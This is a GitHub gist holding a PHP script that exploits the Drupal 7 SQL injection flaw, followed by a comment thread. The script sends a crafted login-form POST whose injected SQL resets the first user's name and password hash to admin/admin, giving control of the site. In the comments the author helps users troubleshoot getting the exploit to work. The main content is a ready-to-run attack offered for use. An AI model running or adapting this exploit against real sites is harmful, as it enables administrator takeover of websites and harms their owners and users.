Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploiting Drupal 7's SQL Injection vulnerability to change the admin user's password. http://milankragujevic.com/post/66
<?php
/********************************************************
* Drupal 7 SQL Injection vulnerability demo
* Created by Milan Kragujevic (of milankragujevic.com)
* Read more at http://milankragujevic.com/post/66
* This will change the first user's username to admin
* and their password to admin
* Change $url to the website URL
********************************************************/
$url = '[URL HERE]'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
@zohar

This comment has been minimized.

Copy link

zohar commented Oct 17, 2014

I tried this on several non-patched Drupal 7 sites and always got an error.

@milankragujevic

This comment has been minimized.

Copy link
Owner

milankragujevic commented Oct 19, 2014

Did you enter the URL correctly? ("http://domain.com/") Maybe the website is using CloudFlare or forbids empty User-Agent headers... Also try logging in, if the website has errors disabled it might indicate it's not vulnerable when in fact it is.

@McBochi

This comment has been minimized.

Copy link

McBochi commented Oct 20, 2014

This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?

@jordanlgraham

This comment has been minimized.

Copy link

jordanlgraham commented Oct 20, 2014

My $data variable comes back empty using this code, and I'm entering the url correctly using my dev server and a 7.31 site that I maintain.

@milankragujevic

This comment has been minimized.

Copy link
Owner

milankragujevic commented Oct 21, 2014

@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.

@jordanlgraham

This comment has been minimized.

Copy link

jordanlgraham commented Oct 21, 2014

@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".

@milankragujevic

This comment has been minimized.

Copy link
Owner

milankragujevic commented Oct 25, 2014

Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment